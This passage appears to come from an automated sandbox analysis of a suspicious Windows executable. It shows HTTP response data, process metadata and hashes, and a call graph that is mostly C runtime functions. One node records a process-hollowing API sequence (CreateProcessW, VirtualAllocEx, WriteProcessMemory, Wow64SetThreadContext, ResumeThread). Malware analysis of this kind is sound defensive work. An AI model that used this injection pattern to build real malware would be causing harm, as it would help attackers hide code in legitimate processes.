                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3Dfl93MSktTJpW%2FJt76%2B0iNWqKSmKlmqvArjB4HAthNjySyj2R2r%2BGT7OX8r7cjo%2FiNjorD21zy3i1Vecx7HepEgxLUsgyPLbtTKDIyE5qH8k7L%2FXlWnuEwr%2BLnp7MTRnc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f854a3b1a07-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1789&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=988&delivery_rate=1551540&cwnd=245&unsent_bytes=0&cid=24e457c5df2803ba&ts=774&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC54INData Raw: 33 30 0d 0a 36 46 56 76 36 64 46 33 6a 79 62 6e 6b 58 32 75 45 44 6f 33 6a 65 69 48 79 4b 64 49 73 39 42 42 6c 4c 35 39 75 35 6c 33 53 57 4f 7a 43 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 306FVv6dF3jybnkX2uEDo3jeiHyKdIs9BBlL59u5l3SWOzCA==
                                                                                                                                                                                                                                                                2024-12-20 06:04:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                Start time:01:03:56
                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\8ZVMneG.exe"
                                                                                                                                                                                                                                                                Imagebase:0xec0000
                                                                                                                                                                                                                                                                File size:810'496 bytes
                                                                                                                                                                                                                                                                MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                Start time:01:03:56
                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                Start time:01:04:00
                                                                                                                                                                                                                                                                Start date:20/12/2024
                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\8ZVMneG.exe"
                                                                                                                                                                                                                                                                Imagebase:0xec0000
                                                                                                                                                                                                                                                                File size:810'496 bytes
                                                                                                                                                                                                                                                                MD5 hash:E8AF4D0D0B47AC68D762B7F288AE8E6E
                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:6%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0.7%
                                                                                                                                                                                                                                                                  Signature Coverage:2.6%
                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:29
                                                                                                                                                                                                                                                                  execution_graph 19422 eca2ea 19423 eca2f6 __EH_prolog3_GS 19422->19423 19425 eca35f 19423->19425 19426 eca346 19423->19426 19430 eca310 19423->19430 19424 ecb98e std::_Throw_Cpp_error 5 API calls 19427 eca437 19424->19427 19441 ed4621 19425->19441 19438 ec9aa0 19426->19438 19430->19424 19431 ec1840 std::_Throw_Cpp_error 29 API calls 19431->19430 19433 eca423 19433->19431 19434 eca37e 19434->19433 19436 ed4621 45 API calls 19434->19436 19437 eca453 19434->19437 19461 ec9949 19434->19461 19436->19434 19437->19433 19465 ed5c77 19437->19465 19439 ed4621 45 API calls 19438->19439 19440 ec9aab 19439->19440 19440->19430 19442 ed462d ___scrt_is_nonwritable_in_current_image 19441->19442 19443 ed464f 19442->19443 19444 ed4637 19442->19444 19478 ecf144 EnterCriticalSection 19443->19478 19446 ed34c5 __strnicoll 14 API calls 19444->19446 19448 ed463c 19446->19448 19447 ed465a 19450 edaab8 __fread_nolock 29 API calls 19447->19450 19458 ed4672 19447->19458 19449 ed3bb0 __strnicoll 29 API calls 19448->19449 19460 ed4647 _Fputc 19449->19460 19450->19458 19451 ed46da 19453 ed34c5 __strnicoll 14 API calls 19451->19453 19452 ed4702 19479 ed473a 19452->19479 19455 ed46df 19453->19455 19457 ed3bb0 __strnicoll 29 API calls 19455->19457 19456 ed4708 19489 ed4732 19456->19489 19457->19460 19458->19451 19458->19452 19460->19434 19462 ec997d 19461->19462 19464 ec9959 19461->19464 19661 ecabc5 19462->19661 19464->19434 19466 ed5c83 ___scrt_is_nonwritable_in_current_image 19465->19466 19467 ed5c9f 19466->19467 19468 ed5c8a 19466->19468 19709 ecf144 EnterCriticalSection 19467->19709 19470 ed34c5 __strnicoll 14 API calls 19468->19470 19472 ed5c8f 19470->19472 19471 ed5ca9 19710 ed5cea 19471->19710 19474 ed3bb0 __strnicoll 29 API calls 19472->19474 19477 ed5c9a 19474->19477 19477->19437 19478->19447 19480 ed475b 19479->19480 19481 ed4746 19479->19481 19483 ed476a 19480->19483 19492 edfa2e 19480->19492 19482 ed34c5 __strnicoll 14 API calls 19481->19482 19484 ed474b 19482->19484 19483->19456 19486 ed3bb0 __strnicoll 29 API calls 19484->19486 19488 ed4756 19486->19488 19488->19456 19660 ecf158 LeaveCriticalSection 19489->19660 19491 ed4738 19491->19460 19493 edfa39 19492->19493 19494 edfa46 19493->19494 19498 edfa5e 19493->19498 19495 ed34c5 __strnicoll 14 API calls 19494->19495 19496 edfa4b 19495->19496 19497 ed3bb0 __strnicoll 29 API calls 19496->19497 19507 ed4767 19497->19507 19499 edfabd 19498->19499 19498->19507 19513 ee1a1f 19498->19513 19501 edaab8 __fread_nolock 29 API calls 19499->19501 19502 edfad6 19501->19502 19518 edfe20 19502->19518 19505 edaab8 __fread_nolock 29 API calls 19506 edfb0f 19505->19506 19506->19507 19508 edaab8 __fread_nolock 29 API calls 19506->19508 19507->19456 19509 edfb1d 19508->19509 19509->19507 19510 edaab8 __fread_nolock 29 API calls 19509->19510 19511 edfb2b 19510->19511 19512 edaab8 __fread_nolock 29 API calls 19511->19512 19512->19507 19514 ed8700 __Getctype 14 API calls 19513->19514 19515 ee1a3c 19514->19515 19516 ed7347 ___free_lconv_mon 14 API calls 19515->19516 19517 ee1a46 19516->19517 19517->19499 19519 edfe2c ___scrt_is_nonwritable_in_current_image 19518->19519 19520 edfe34 19519->19520 19525 edfe4f 19519->19525 19521 ed34d8 __dosmaperr 14 API calls 19520->19521 19522 edfe39 19521->19522 19523 ed34c5 __strnicoll 14 API calls 19522->19523 19547 edfade 19523->19547 19524 edfe66 19527 ed34d8 __dosmaperr 14 API calls 19524->19527 19525->19524 19526 edfea1 19525->19526 19528 edfebf 19526->19528 19529 edfeaa 19526->19529 19530 edfe6b 19527->19530 19548 edebd5 EnterCriticalSection 19528->19548 19531 ed34d8 __dosmaperr 14 API calls 19529->19531 19533 ed34c5 __strnicoll 14 API calls 19530->19533 19535 edfeaf 19531->19535 19534 edfe73 19533->19534 19540 ed3bb0 __strnicoll 29 API calls 19534->19540 19537 ed34c5 __strnicoll 14 API calls 19535->19537 19536 edfec5 19538 edfef9 19536->19538 19539 edfee4 19536->19539 19537->19534 19549 edff39 19538->19549 19542 ed34c5 __strnicoll 14 API calls 19539->19542 19540->19547 19543 edfee9 19542->19543 19545 ed34d8 __dosmaperr 14 API calls 19543->19545 19544 edfef4 19612 edff31 19544->19612 19545->19544 19547->19505 19547->19507 19548->19536 19550 edff4b 19549->19550 19551 edff63 19549->19551 19552 ed34d8 __dosmaperr 14 API calls 19550->19552 19553 ee02a5 19551->19553 19556 edffa6 19551->19556 19554 edff50 19552->19554 19555 ed34d8 __dosmaperr 14 API calls 19553->19555 19557 ed34c5 __strnicoll 14 API calls 19554->19557 19558 ee02aa 19555->19558 19559 edffb1 19556->19559 19562 edff58 19556->19562 19567 edffe1 19556->19567 19557->19562 19560 ed34c5 __strnicoll 14 API calls 19558->19560 19561 ed34d8 __dosmaperr 14 API calls 19559->19561 19563 edffbe 19560->19563 19564 edffb6 19561->19564 19562->19544 19565 ed3bb0 __strnicoll 29 API calls 19563->19565 19566 ed34c5 __strnicoll 14 API calls 19564->19566 19565->19562 19566->19563 19568 edfffa 19567->19568 19569 ee0007 19567->19569 19570 ee0035 19567->19570 19568->19569 19575 ee0023 19568->19575 19571 ed34d8 __dosmaperr 14 API calls 19569->19571 19572 ed7381 __fread_nolock 15 API calls 19570->19572 19573 ee000c 19571->19573 19576 ee0046 19572->19576 19577 ed34c5 __strnicoll 14 API calls 19573->19577 19619 ee26b4 19575->19619 19580 ed7347 ___free_lconv_mon 14 API calls 19576->19580 19578 ee0013 19577->19578 19581 ed3bb0 __strnicoll 29 API calls 19578->19581 19579 ee0181 19582 ee01f5 19579->19582 19586 ee019a GetConsoleMode 19579->19586 19583 ee004f 19580->19583 19585 ee001e __fread_nolock 19581->19585 19584 ee01f9 ReadFile 19582->19584 19587 ed7347 ___free_lconv_mon 14 API calls 19583->19587 19588 ee026d GetLastError 19584->19588 19589 ee0211 19584->19589 19601 ed7347 ___free_lconv_mon 14 API calls 19585->19601 19586->19582 19590 ee01ab 19586->19590 19591 ee0056 19587->19591 19592 ee027a 19588->19592 19593 ee01d1 19588->19593 19589->19588 19594 ee01ea 19589->19594 19590->19584 19595 ee01b1 ReadConsoleW 19590->19595 19596 ee007b 19591->19596 19597 ee0060 19591->19597 19598 ed34c5 __strnicoll 14 API calls 19592->19598 19593->19585 19605 ed34eb __dosmaperr 14 API calls 19593->19605 19594->19585 19608 ee0236 19594->19608 19610 ee024d 19594->19610 19595->19594 19600 ee01cb GetLastError 19595->19600 19615 eddccf 19596->19615 19602 ed34c5 __strnicoll 14 API calls 19597->19602 19604 ee027f 19598->19604 19600->19593 19601->19562 19603 ee0065 19602->19603 19606 ed34d8 __dosmaperr 14 API calls 19603->19606 19607 ed34d8 __dosmaperr 14 API calls 19604->19607 19605->19585 19606->19585 19607->19585 19628 ee0342 19608->19628 19610->19585 19641 ee05e6 19610->19641 19659 edebf8 LeaveCriticalSection 19612->19659 19614 edff37 19614->19547 19616 eddce3 _Fputc 19615->19616 19647 edde70 19616->19647 19618 eddcf8 _Fputc 19618->19575 19620 ee26ce 19619->19620 19621 ee26c1 19619->19621 19623 ed34c5 __strnicoll 14 API calls 19620->19623 19625 ee26da 19620->19625 19622 ed34c5 __strnicoll 14 API calls 19621->19622 19624 ee26c6 19622->19624 19626 ee26fb 19623->19626 19624->19579 19625->19579 19627 ed3bb0 __strnicoll 29 API calls 19626->19627 19627->19624 19653 ee0499 19628->19653 19630 ed73cf __strnicoll MultiByteToWideChar 19631 ee0456 19630->19631 19635 ee045f GetLastError 19631->19635 19638 ee038a 19631->19638 19632 ee03e4 19639 ee039e 19632->19639 19640 eddccf __fread_nolock 31 API calls 19632->19640 19633 ee03d4 19636 ed34c5 __strnicoll 14 API calls 19633->19636 19637 ed34eb __dosmaperr 14 API calls 19635->19637 19636->19638 19637->19638 19638->19585 19639->19630 19640->19639 19642 ee0620 19641->19642 19643 ee06b6 ReadFile 19642->19643 19644 ee06b1 19642->19644 19643->19644 19645 ee06d3 19643->19645 19644->19585 19645->19644 19646 eddccf __fread_nolock 31 API calls 19645->19646 19646->19644 19648 ede98c __fread_nolock 29 API calls 19647->19648 19649 edde82 19648->19649 19650 edde9e SetFilePointerEx 19649->19650 19652 edde8a __fread_nolock 19649->19652 19651 eddeb6 GetLastError 19650->19651 19650->19652 19651->19652 19652->19618 19654 ee04cd 19653->19654 19655 ee053e ReadFile 19654->19655 19656 ee0359 19654->19656 19655->19656 19657 ee0557 19655->19657 19656->19632 19656->19633 19656->19638 19656->19639 19657->19656 19658 eddccf __fread_nolock 31 API calls 19657->19658 19658->19656 19659->19614 19660->19491 19662 ecac79 19661->19662 19663 ecabe9 19661->19663 19665 ec1e30 std::_Throw_Cpp_error 30 API calls 19662->19665 19664 ec1eb0 std::_Throw_Cpp_error 5 API calls 19663->19664 19666 ecabfb 19664->19666 19667 ecac7e 19665->19667 19672 ec20c0 19666->19672 19669 ecac06 _Yarn 19671 ecac47 _Yarn 19669->19671 19679 ec1a10 19669->19679 19671->19464 19673 ec20df 19672->19673 19678 ec20d3 19672->19678 19674 ec20ec 19673->19674 19675 ec20ff 19673->19675 19685 ec2140 19674->19685 19693 ec21b0 19675->19693 19678->19669 19680 ec1a33 19679->19680 19682 ec1a45 messages 19679->19682 19705 ec1a70 19680->19705 19683 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 19682->19683 19684 ec1a61 19683->19684 19684->19671 19686 ec215e 19685->19686 19687 ec2163 19685->19687 19696 ec21d0 19686->19696 19689 ec21b0 std::_Throw_Cpp_error 3 API calls 19687->19689 19690 ec216e 19689->19690 19691 ec217b 19690->19691 19700 ed3bc0 19690->19700 19691->19678 19694 ec8e36 std::ios_base::_Init 3 API calls 19693->19694 19695 ec21c2 19694->19695 19695->19678 19697 ec21e8 std::ios_base::_Init 19696->19697 19698 ecc47a CallUnexpected RaiseException 19697->19698 19699 ec21fd 19698->19699 19701 ed3dff __strnicoll 29 API calls 19700->19701 19702 ed3bcf 19701->19702 19703 ed3bdd __Getctype 11 API calls 19702->19703 19704 ed3bdc 19703->19704 19706 ec1ab3 19705->19706 19707 ec1abd 19706->19707 19708 ed3bc0 std::_Throw_Cpp_error 29 API calls 19706->19708 19707->19682 19708->19707 19709->19471 19711 ed5d02 19710->19711 19713 ed5d72 19710->19713 19712 edaab8 __fread_nolock 29 API calls 19711->19712 19717 ed5d08 19712->19717 19714 ee1a1f __fread_nolock 14 API calls 19713->19714 19715 ed5cb7 19713->19715 19714->19715 19721 ed5ce2 19715->19721 19716 ed5d5a 19718 ed34c5 __strnicoll 14 API calls 19716->19718 19717->19713 19717->19716 19719 ed5d5f 19718->19719 19720 ed3bb0 __strnicoll 29 API calls 19719->19720 19720->19715 19724 ecf158 LeaveCriticalSection 19721->19724 19723 ed5ce8 19723->19477 19724->19723 22464 ec8deb 22469 ec9bea 22464->22469 22466 ec8dfe 22467 ec8f6d std::ios_base::_Init 32 API calls 22466->22467 22468 ec8e08 22467->22468 22470 ec9bf6 __EH_prolog3 22469->22470 22473 ec9b1f 22470->22473 22472 ec9c48 std::ios_base::_Init 22472->22466 22482 ec99d8 22473->22482 22475 ec9b2a 22490 ec3e50 22475->22490 22478 ec9b56 22480 ec9b62 22478->22480 22508 ecb99d 22478->22508 22480->22472 22483 ec99e4 __EH_prolog3 22482->22483 22484 ec2ae0 std::ios_base::_Init 39 API calls 22483->22484 22485 ec9a15 22484->22485 22486 ec8e36 std::ios_base::_Init 3 API calls 22485->22486 22487 ec9a1c 22486->22487 22488 ec9a2d std::ios_base::_Init 22487->22488 22513 ec94bf 22487->22513 22488->22475 22491 ec3e74 22490->22491 22492 ec3ec0 67 API calls 22491->22492 22493 ec3e82 std::ios_base::_Ios_base_dtor 22492->22493 22494 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22493->22494 22495 ec3eb1 22494->22495 22495->22478 22496 ec2ae0 22495->22496 22497 ec2bcc 22496->22497 22498 ec2b24 22496->22498 22499 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22497->22499 22501 ecc47a CallUnexpected RaiseException 22498->22501 22502 ec2b44 22498->22502 22500 ec2bd6 22499->22500 22500->22478 22501->22502 22551 ec2be0 22502->22551 22504 ec2b9f 22554 ec2c20 22504->22554 22507 ecc47a CallUnexpected RaiseException 22507->22497 22509 ec91bd std::_Lockit::_Lockit 7 API calls 22508->22509 22510 ecb9ab 22509->22510 22511 ec91ee std::_Lockit::~_Lockit 2 API calls 22510->22511 22512 ecb9e6 22511->22512 22512->22480 22514 ec94cb __EH_prolog3 22513->22514 22515 ec91bd std::_Lockit::_Lockit 7 API calls 22514->22515 22516 ec94d6 22515->22516 22524 ec9507 22516->22524 22525 ec93c8 22516->22525 22518 ec91ee std::_Lockit::~_Lockit 2 API calls 22520 ec9544 std::ios_base::_Init 22518->22520 22519 ec94e9 22531 ec9552 22519->22531 22520->22488 22523 ec9349 _Yarn 14 API calls 22523->22524 22524->22518 22526 ec8e36 std::ios_base::_Init 3 API calls 22525->22526 22527 ec93d3 22526->22527 22528 ec93e7 22527->22528 22535 ec945c 22527->22535 22528->22519 22532 ec955e 22531->22532 22533 ec94f1 22531->22533 22538 ecb844 22532->22538 22533->22523 22536 ec9349 _Yarn 14 API calls 22535->22536 22537 ec93e5 22536->22537 22537->22519 22539 ed411a 22538->22539 22540 ecb854 EncodePointer 22538->22540 22541 ed97c5 CallUnexpected 2 API calls 22539->22541 22540->22533 22542 ed411f 22541->22542 22543 ed97ec CallUnexpected 39 API calls 22542->22543 22546 ed412a 22542->22546 22543->22546 22544 ed4134 IsProcessorFeaturePresent 22547 ed4140 22544->22547 22545 ed1334 CallUnexpected 21 API calls 22548 ed415d 22545->22548 22546->22544 22550 ed4153 22546->22550 22549 ed3c11 CallUnexpected 8 API calls 22547->22549 22549->22550 22550->22545 22559 ec2dc0 22551->22559 22553 ec2bf7 std::ios_base::_Init 22553->22504 22577 ec31e0 22554->22577 22557 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22558 ec2bb4 22557->22558 22558->22507 22562 ec2e00 22559->22562 22563 ec2dc8 22562->22563 22564 ec2e27 22562->22564 22563->22553 22570 ec8eb8 AcquireSRWLockExclusive 22564->22570 22566 ec2e35 22566->22563 22567 ec8f6d std::ios_base::_Init 32 API calls 22566->22567 22568 ec2e50 22567->22568 22575 ec8f07 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 22568->22575 22574 ec8ecc 22570->22574 22572 ec8ed1 ReleaseSRWLockExclusive 22572->22566 22574->22572 22576 ec8f58 SleepConditionVariableSRW 22574->22576 22575->22563 22576->22574 22578 ec1040 std::_Throw_Cpp_error 30 API calls 22577->22578 22579 ec3218 22578->22579 22580 ec32c0 std::_Throw_Cpp_error 30 API calls 22579->22580 22581 ec3243 22580->22581 22582 ec10b0 std::_Throw_Cpp_error 29 API calls 22581->22582 22583 ec324e 22582->22583 22584 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22583->22584 22585 ec2c67 22584->22585 22585->22557 22623 eca7f0 22624 eca828 22623->22624 22625 eca7f9 22623->22625 22625->22624 22628 ed42be 22625->22628 22627 eca81b 22629 ed42d0 22628->22629 22632 ed42d9 ___scrt_uninitialize_crt 22628->22632 22630 ed443c ___scrt_uninitialize_crt 68 API calls 22629->22630 22631 ed42d6 22630->22631 22631->22627 22633 ed42e8 22632->22633 22636 ed45c1 22632->22636 22633->22627 22637 ed45cd ___scrt_is_nonwritable_in_current_image 22636->22637 22644 ecf144 EnterCriticalSection 22637->22644 22639 ed45db 22640 ed431a ___scrt_uninitialize_crt 68 API calls 22639->22640 22641 ed45ec 22640->22641 22645 ed4615 22641->22645 22644->22639 22648 ecf158 LeaveCriticalSection 22645->22648 22647 ed430f 22647->22627 22648->22647 17517 ef21a9 17521 ef21df 17517->17521 17518 ef232c GetPEB 17519 ef233e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17518->17519 17520 ef23e5 WriteProcessMemory 17519->17520 17519->17521 17522 ef242a 17520->17522 17521->17518 17521->17519 17523 ef242f WriteProcessMemory 17522->17523 17524 ef246c WriteProcessMemory Wow64SetThreadContext ResumeThread 17522->17524 17523->17522 22811 eca7a2 22813 eca7ae 22811->22813 22812 eca7e5 22813->22812 22817 ed54a4 22813->22817 22815 eca7d2 22815->22812 22821 eca848 22815->22821 22818 ed54b7 _Fputc 22817->22818 22825 ed5511 22818->22825 22820 ed54cc _Fputc 22820->22815 22822 eca867 22821->22822 22823 eca889 22822->22823 22855 ecf0fe 22822->22855 22823->22812 22826 ed5523 22825->22826 22828 ed5546 22825->22828 22827 ed3d59 _Fputc 29 API calls 22826->22827 22829 ed553e 22827->22829 22828->22826 22830 ed556d 22828->22830 22829->22820 22833 ed5647 22830->22833 22834 ed5653 ___scrt_is_nonwritable_in_current_image 22833->22834 22841 ecf144 EnterCriticalSection 22834->22841 22836 ed5661 22842 ed55a7 22836->22842 22838 ed566e 22851 ed5696 22838->22851 22841->22836 22843 ed437f ___scrt_uninitialize_crt 64 API calls 22842->22843 22844 ed55c2 22843->22844 22845 ed9c82 14 API calls 22844->22845 22846 ed55cc 22845->22846 22847 ed8700 __Getctype 14 API calls 22846->22847 22850 ed55e7 22846->22850 22848 ed560b 22847->22848 22849 ed7347 ___free_lconv_mon 14 API calls 22848->22849 22849->22850 22850->22838 22854 ecf158 LeaveCriticalSection 22851->22854 22853 ed55a5 22853->22820 22854->22853 22856 ecf11f 22855->22856 22857 ecf10a 22855->22857 22856->22823 22858 ed34c5 __strnicoll 14 API calls 22857->22858 22859 ecf10f 22858->22859 22860 ed3bb0 __strnicoll 29 API calls 22859->22860 22861 ecf11a 22860->22861 22861->22823 20580 eca489 20582 eca49f _Yarn 20580->20582 20581 eca4a5 20582->20581 20583 eca54b 20582->20583 20586 ed4a84 20582->20586 20583->20581 20585 ed4a84 __fread_nolock 45 API calls 20583->20585 20585->20581 20589 ed49e7 20586->20589 20590 ed49f3 ___scrt_is_nonwritable_in_current_image 20589->20590 20591 ed4a3d 20590->20591 20596 ed4a06 std::invalid_argument::invalid_argument 20590->20596 20601 ed4a2b 20590->20601 20602 ecf144 EnterCriticalSection 20591->20602 20593 ed4a47 20603 ed4aa1 20593->20603 20594 ed34c5 __strnicoll 14 API calls 20597 ed4a20 20594->20597 20596->20594 20599 ed3bb0 __strnicoll 29 API calls 20597->20599 20599->20601 20601->20582 20602->20593 20604 ed4a5e 20603->20604 20607 ed4ab3 std::invalid_argument::invalid_argument 20603->20607 20617 ed4a7c 20604->20617 20605 ed4ac0 20606 ed34c5 __strnicoll 14 API calls 20605->20606 20615 ed4ac5 20606->20615 20607->20604 20607->20605 20614 ed4b11 20607->20614 20608 ed3bb0 __strnicoll 29 API calls 20608->20604 20609 edfa2e __fread_nolock 43 API calls 20609->20614 20610 ed4c3c std::invalid_argument::invalid_argument 20613 ed34c5 __strnicoll 14 API calls 20610->20613 20611 ed4966 __fread_nolock 29 API calls 20611->20614 20612 edaab8 __fread_nolock 29 API calls 20612->20614 20613->20615 20614->20604 20614->20609 20614->20610 20614->20611 20614->20612 20616 edff39 __fread_nolock 41 API calls 20614->20616 20615->20608 20616->20614 20620 ecf158 LeaveCriticalSection 20617->20620 20619 ed4a82 20619->20601 20620->20619 20625 ec949d 20628 ec939d 20625->20628 20627 ec94a8 messages 20633 ec93eb 20628->20633 20631 ec93bb 20631->20627 20632 ed4c7a std::locale::_Locimp::~_Locimp 14 API calls 20632->20631 20640 ec91bd 20633->20640 20635 ed4c7a std::locale::_Locimp::~_Locimp 14 API calls 20636 ec944f 20635->20636 20646 ec91ee 20636->20646 20638 ec93ac 20638->20631 20638->20632 20641 ec91cc 20640->20641 20642 ec91d3 20640->20642 20653 ed3ed6 20641->20653 20645 ec91d1 20642->20645 20658 ecb828 EnterCriticalSection 20642->20658 20645->20635 20647 ed3ee4 20646->20647 20648 ec91f8 20646->20648 20705 ed3ebf LeaveCriticalSection 20647->20705 20652 ec920b 20648->20652 20704 ecb836 LeaveCriticalSection 20648->20704 20650 ed3eeb 20650->20638 20652->20638 20659 ed832b 20653->20659 20658->20645 20660 ed84b2 std::_Lockit::_Lockit 5 API calls 20659->20660 20661 ed8330 20660->20661 20680 ed84cc 20661->20680 20668 ed851a std::_Lockit::_Lockit 5 API calls 20669 ed8344 20668->20669 20689 ed8534 20669->20689 20679 ed835d 20679->20679 20681 ed842d std::_Lockit::_Lockit 5 API calls 20680->20681 20682 ed8335 20681->20682 20683 ed84e6 20682->20683 20684 ed842d std::_Lockit::_Lockit 5 API calls 20683->20684 20685 ed833a 20684->20685 20686 ed8500 20685->20686 20687 ed842d std::_Lockit::_Lockit 5 API calls 20686->20687 20688 ed833f 20687->20688 20688->20668 20690 ed842d std::_Lockit::_Lockit 5 API calls 20689->20690 20691 ed8349 20690->20691 20692 ed854e 20691->20692 20693 ed842d std::_Lockit::_Lockit 5 API calls 20692->20693 20694 ed834e 20693->20694 20695 ed8568 20694->20695 20696 ed842d std::_Lockit::_Lockit 5 API calls 20695->20696 20697 ed8353 20696->20697 20698 ed8582 20697->20698 20699 ed842d std::_Lockit::_Lockit 5 API calls 20698->20699 20700 ed8358 20699->20700 20701 ed859c 20700->20701 20702 ed842d std::_Lockit::_Lockit 5 API calls 20701->20702 20703 ed85b2 20702->20703 20703->20679 20704->20652 20705->20650 17525 ecc190 17526 ecc19c ___scrt_is_nonwritable_in_current_image 17525->17526 17551 ec9093 17526->17551 17528 ecc1a3 17529 ecc2fc 17528->17529 17539 ecc1cd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 17528->17539 17599 ecb64c IsProcessorFeaturePresent 17529->17599 17531 ecc303 17603 ed131e 17531->17603 17536 ecc1ec 17537 ecc26d 17562 ed389d 17537->17562 17539->17536 17539->17537 17581 ed1368 17539->17581 17541 ecc273 17566 ef5bf0 17541->17566 17552 ec909c 17551->17552 17609 ecb2b8 IsProcessorFeaturePresent 17552->17609 17556 ec90ad 17557 ec90b1 17556->17557 17619 ecf05f 17556->17619 17557->17528 17560 ec90c8 17560->17528 17563 ed38a6 17562->17563 17564 ed38ab 17562->17564 17691 ed39c6 17563->17691 17564->17541 18599 ec1790 17566->18599 17569 ec1790 141 API calls 17570 ef5c32 17569->17570 18602 ec1690 17570->18602 17582 ed137e std::_Lockit::_Lockit 17581->17582 17583 ed5c3b ___scrt_is_nonwritable_in_current_image 17581->17583 17582->17537 17584 ed75d3 __Getctype 39 API calls 17583->17584 17585 ed5c4c 17584->17585 17586 ed411a CallUnexpected 39 API calls 17585->17586 17587 ed5c76 17586->17587 17600 ecb662 std::invalid_argument::invalid_argument CallUnexpected 17599->17600 17601 ecb70d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17600->17601 17602 ecb751 CallUnexpected 17601->17602 17602->17531 17604 ed1469 CallUnexpected 21 API calls 17603->17604 17605 ecc309 17604->17605 17606 ed1334 17605->17606 17607 ed1469 CallUnexpected 21 API calls 17606->17607 17608 ecc311 17607->17608 17610 ec90a8 17609->17610 17611 eccb29 17610->17611 17628 ed7016 17611->17628 17615 eccb3a 17616 eccb45 17615->17616 17642 ed7052 17615->17642 17616->17556 17618 eccb32 17618->17556 17682 ed970e 17619->17682 17622 eccb48 17623 eccb5b 17622->17623 17624 eccb51 17622->17624 17623->17557 17625 ed60e9 ___vcrt_uninitialize_ptd 6 API calls 17624->17625 17626 eccb56 17625->17626 17627 ed7052 ___vcrt_uninitialize_locks DeleteCriticalSection 17626->17627 17627->17623 17629 ed701f 17628->17629 17631 ed7048 17629->17631 17632 eccb2e 17629->17632 17646 ee1b6a 17629->17646 17633 ed7052 ___vcrt_uninitialize_locks DeleteCriticalSection 17631->17633 17632->17618 17634 ed60b6 17632->17634 17633->17632 17663 ee1a7b 17634->17663 17639 ed60e6 17639->17615 17641 ed60cb 17641->17615 17643 ed707c 17642->17643 17644 ed705d 17642->17644 17643->17618 17645 ed7067 DeleteCriticalSection 17644->17645 17645->17643 17645->17645 17651 ee1bfc 17646->17651 17649 ee1ba2 InitializeCriticalSectionAndSpinCount 17650 ee1b8d 17649->17650 17650->17629 